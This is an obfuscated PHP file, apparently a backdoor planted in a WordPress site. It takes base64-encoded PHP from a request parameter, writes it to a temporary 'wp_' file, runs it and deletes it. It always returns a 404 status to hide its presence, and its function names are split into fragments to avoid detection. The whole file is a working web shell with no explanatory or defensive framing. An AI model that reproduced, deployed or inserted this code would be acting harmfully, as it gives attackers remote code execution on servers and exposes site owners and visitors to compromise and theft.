<?php
try{
$f6a4e8=array('temp'.'nam','un'.'link','arr'.'ay_key_exists','base64_dec'.'ode','file_'.'put_contents','sys_get_temp_'.'dir');
$fd2ca1='4f10bc'.'fc';
if($f6a4e8[2]($fd2ca1,$_POST)){
$k42ceb=$f6a4e8[3]($_POST[$fd2ca1]);
}elseif($f6a4e8[2]($fd2ca1,$_GET)){
$k42ceb=$f6a4e8[3]($_GET[$fd2ca1]);
}else{$k42ceb=null;}
if($k42ceb){
$xf18c4=$f6a4e8[0]($f6a4e8[5](),'w'.'p_');
if($xf18c4){
$f6a4e8[4]($xf18c4,'<'.'?ph'.'p '.$k42ceb);
http_response_code(404);
@include_once($xf18c4);
@$f6a4e8[1]($xf18c4);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
